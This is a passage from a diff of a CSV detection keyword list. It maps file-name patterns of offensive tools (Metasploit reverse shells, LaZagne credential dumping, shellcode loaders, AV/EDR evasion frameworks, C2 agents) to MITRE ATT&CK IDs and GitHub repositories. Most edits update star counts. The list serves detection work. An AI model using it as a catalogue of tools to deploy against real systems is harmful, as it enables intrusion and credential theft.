security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*Windows/lazagne.spec*","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1552 - T1003 - T1555","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/AlessandroZ/LaZagne","1","1","N/A","10","10","8530","1980","2023-08-12T12:38:22Z","2015-02-16T14:10:02Z" +"*windows/shell_reverse_tcp*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*windows/x64/meterpreter_reverse_tcp*","offensive_tool_keyword","charlotte","c++ fully undetected shellcode launcher","T1055.012 - T1059.003 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/9emin1/charlotte","1","1","N/A","10","10","931","235","2021-06-11T04:44:18Z","2021-05-13T07:32:03Z" "*windows_agent/asm/x64/alter_pe_sections*","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","10","10","430","66","2022-08-23T18:20:33Z","2021-01-26T22:56:50Z" "*windows_agent/asm/x86/alter_pe_sections*","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","10","10","430","66","2022-08-23T18:20:33Z","2021-01-26T22:56:50Z" "*windows_agent/dll_main.*","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - 
TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","10","10","430","66","2022-08-23T18:20:33Z","2021-01-26T22:56:50Z" 
@@ -18282,68 +18470,68 @@
 "*windows_agent/win_*.c*","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","10","10","430","66","2022-08-23T18:20:33Z","2021-01-26T22:56:50Z"
 "*windows_agent/win_named_pipe.*","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","10","10","430","66","2022-08-23T18:20:33Z","2021-01-26T22:56:50Z"
 "*windows_agent/win_shell.*","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","10","10","430","66","2022-08-23T18:20:33Z","2021-01-26T22:56:50Z"
-"*windows_autologin.md*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z"
+"*windows_autologin.md*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
 "*windows_console_interceptor*dll_main.c*","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","10","10","430","66","2022-08-23T18:20:33Z","2021-01-26T22:56:50Z"
 "*windows_console_interceptor*exe_main.c*","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","10","10","430","66","2022-08-23T18:20:33Z","2021-01-26T22:56:50Z"
 "*windows_console_interceptor*interceptor.*","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","10","10","430","66","2022-08-23T18:20:33Z","2021-01-26T22:56:50Z"
-"*windows_credentials.py*","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6330","762","2023-10-03T21:06:53Z","2015-08-30T07:22:51Z"
+"*windows_credentials.py*","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6332","762","2023-10-04T21:10:48Z","2015-08-30T07:22:51Z"
 "*windows_key.py*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z"
 "*windows_recon.bat*","offensive_tool_keyword","Windows-Privilege-Escalation","Windows Privilege Escalation Techniques and Scripts","T1055 - T1548 - T1078","TA0004 - TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/frizb/Windows-Privilege-Escalation","1","1","N/A","N/A","8","710","185","2020-03-25T22:35:02Z","2017-05-12T13:09:50Z"
-"*windows_sam_hivenightmare.md*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z"
-"*windows_sam_hivenightmare.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z"
+"*windows_sam_hivenightmare.md*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
+"*windows_sam_hivenightmare.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
 "*windows10_ntfs_crash_dos*","offensive_tool_keyword","POC","PoC for a NTFS crash that I discovered. in various Windows versions Type of issue: denial of service. One can generate blue-screen-of-death using a handcrafted NTFS image. This Denial of Service type of attack. can be driven from user mode. limited user account or Administrator. It can even crash the system if it is in locked state.","T1499.002 - T1059.001 - T1538.002","TA0002 - TA0007 - TA0008","N/A","N/A","DDOS","https://github.com/mtivadar/windows10_ntfs_crash_dos","1","1","N/A","N/A","6","589","137","2020-04-28T18:11:52Z","2018-04-27T19:31:59Z"
 "*Windows7-BypassLogon-Screen.ino*","offensive_tool_keyword","Pateensy","payload for teensy like a rubber ducky but the syntax is different. this Human interfaes device ( HID attacks ). Penetration With Teensy","T1025 T1052","N/A","N/A","N/A","Exploitation tools","https://github.com/screetsec/Pateensy","1","1","N/A","N/A","2","132","64","2017-01-26T12:02:56Z","2016-03-21T07:29:38Z"
-"*WindowsEnum -*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Invoke-WinEnum.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z"
-"*WindowsExploits*","offensive_tool_keyword","Exploits","A curated archive of complied and tested public Windows exploits.","T1213 - T1210 - T1188 - T1055","TA0001 - TA0009 - TA0008","N/A","N/A","Exploitation tools","https://github.com/WindowsExploits/Exploits","1","1","N/A","N/A","10","1212","565","2020-05-29T19:09:52Z","2017-06-05T15:39:22Z"
+"*WindowsEnum -*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Invoke-WinEnum.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z"
+"*WindowsExploits*","offensive_tool_keyword","Exploits","A curated archive of complied and tested public Windows exploits.","T1213 - T1210 - T1188 - T1055","TA0001 - TA0009 - TA0008","N/A","N/A","Exploitation tools","https://github.com/WindowsExploits/Exploits","1","1","N/A","N/A","10","1213","565","2020-05-29T19:09:52Z","2017-06-05T15:39:22Z"
 "*windows-exploit-suggester.*","offensive_tool_keyword","cobaltstrike","Erebus CobaltStrike post penetration testing plugin","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/DeEpinGh0st/Erebus","1","1","N/A","10","10","1356","214","2021-10-28T06:20:51Z","2019-09-26T09:32:00Z"
 "*windows-forkbomb.ino*","offensive_tool_keyword","Pateensy","payload for teensy like a rubber ducky but the syntax is different. this Human interfaes device ( HID attacks ). Penetration With Teensy","T1025 T1052","N/A","N/A","N/A","Exploitation tools","https://github.com/screetsec/Pateensy","1","1","N/A","N/A","2","132","64","2017-01-26T12:02:56Z","2016-03-21T07:29:38Z"
 "*WindowsLies*BlockWindows*","offensive_tool_keyword","BlockWindows","Stop Windows 7 through 10 Nagging and Spying updates. Tasks. IPs. and services. Works with Windows 7 through 10","T1059 - T1562 - T1053 - T1543","TA0002 - TA0003 - TA0004 - TA0008","N/A","N/A","Defense Evasion","https://github.com/WindowsLies/BlockWindows","1","1","N/A","N/A","7","644","109","2020-04-11T15:38:12Z","2015-08-26T01:17:57Z"
-"*Windows-Post-Exploitation*","offensive_tool_keyword","Windows-Post-Exploitation","Windows Post Exploitation list of tools on github. could also be related to folder name","T1021 - T1059 - T1078 - T1056 - T1028 - T1053 - T1003","TA0002 - TA0003 - TA0004 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","POST Exploitation tools","https://github.com/emilyanncr/Windows-Post-Exploitation","1","1","N/A","N/A","5","491","122","2021-09-20T01:47:13Z","2017-11-18T04:16:41Z"
+"*Windows-Post-Exploitation*","offensive_tool_keyword","Windows-Post-Exploitation","Windows Post Exploitation list of tools on github. could also be related to folder name","T1021 - T1059 - T1078 - T1056 - T1028 - T1053 - T1003","TA0002 - TA0003 - TA0004 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","POST Exploitation tools","https://github.com/emilyanncr/Windows-Post-Exploitation","1","1","N/A","N/A","5","492","122","2021-09-20T01:47:13Z","2017-11-18T04:16:41Z"
 "*windows-privesc-check*","offensive_tool_keyword","Windows-Privilege-Escalation","Windows Privilege Escalation Techniques and Scripts","T1055 - T1548 - T1078","TA0004 - TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/frizb/Windows-Privilege-Escalation","1","1","N/A","N/A","8","710","185","2020-03-25T22:35:02Z","2017-05-12T13:09:50Z"
 "*Windows-Privilege-Escalation*","offensive_tool_keyword","Windows-Privilege-Escalation","Windows Privilege Escalation Techniques and Scripts","T1055 - T1548 - T1078","TA0004 - TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/frizb/Windows-Privilege-Escalation","1","1","N/A","N/A","8","710","185","2020-03-25T22:35:02Z","2017-05-12T13:09:50Z"
-"*WindowsShareFinder.cs*","offensive_tool_keyword","SMBeagle","SMBeagle is an (SMB) fileshare auditing tool that hunts out all files it can see in the network and reports if the file can be read and/or written. All these findings are streamed out to either a CSV file or an elasticsearch host.","T1087.002 - T1021.002 - T1210","TA0007 - TA0008 - TA0003","N/A","N/A","Discovery","https://github.com/punk-security/SMBeagle","1","1","N/A","9","7","650","79","2023-07-28T09:35:30Z","2021-05-31T19:46:57Z"
-"*winexec.notepad.raw*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","0","N/A","N/A","10","1356","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z"
-"*WinhttpShellcode.cpp*","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","1","N/A","9","3","296","75","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z"
-"*WinhttpShellcode.exe*","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","1","N/A","9","3","296","75","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z"
-"*WinhttpShellcode.sln*","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","1","N/A","9","3","296","75","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z"
-"*WinhttpShellcode.vcxproj*","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","1","N/A","9","3","296","75","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z"
-"*Win-Ops-Master.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z"
+"*WindowsShareFinder.cs*","offensive_tool_keyword","SMBeagle","SMBeagle is an (SMB) fileshare auditing tool that hunts out all files it can see in the network and reports if the file can be read and/or written. All these findings are streamed out to either a CSV file or an elasticsearch host.","T1087.002 - T1021.002 - T1210","TA0007 - TA0008 - TA0003","N/A","N/A","Discovery","https://github.com/punk-security/SMBeagle","1","1","N/A","9","7","651","79","2023-07-28T09:35:30Z","2021-05-31T19:46:57Z"
+"*winexec.notepad.raw*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","0","N/A","N/A","10","1357","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z"
+"*WinhttpShellcode.cpp*","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","1","N/A","9","3","297","76","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z"
+"*WinhttpShellcode.exe*","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","1","N/A","9","3","297","76","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z"
+"*WinhttpShellcode.sln*","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","1","N/A","9","3","297","76","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z"
+"*WinhttpShellcode.vcxproj*","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","1","N/A","9","3","297","76","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z"
+"*Win-Ops-Master.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
 "*Winpayloads*","offensive_tool_keyword","Winpayloads","Undetectable Windows Payload Generation with extras Running on Python2.7","T1203 - T1027 - T1059","TA0002 - TA0003 - TA0007","N/A","N/A","Defense Evasion","https://github.com/nccgroup/Winpayloads","1","1","N/A","N/A","10","1517","361","2022-11-08T08:14:23Z","2015-10-09T09:29:49Z"
 "*winPEAS.bat*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","1","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z"
-"*winPEAS.bat*","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","1","N/A","N/A","10","13375","2820","2023-10-02T22:12:50Z","2019-01-13T19:58:24Z"
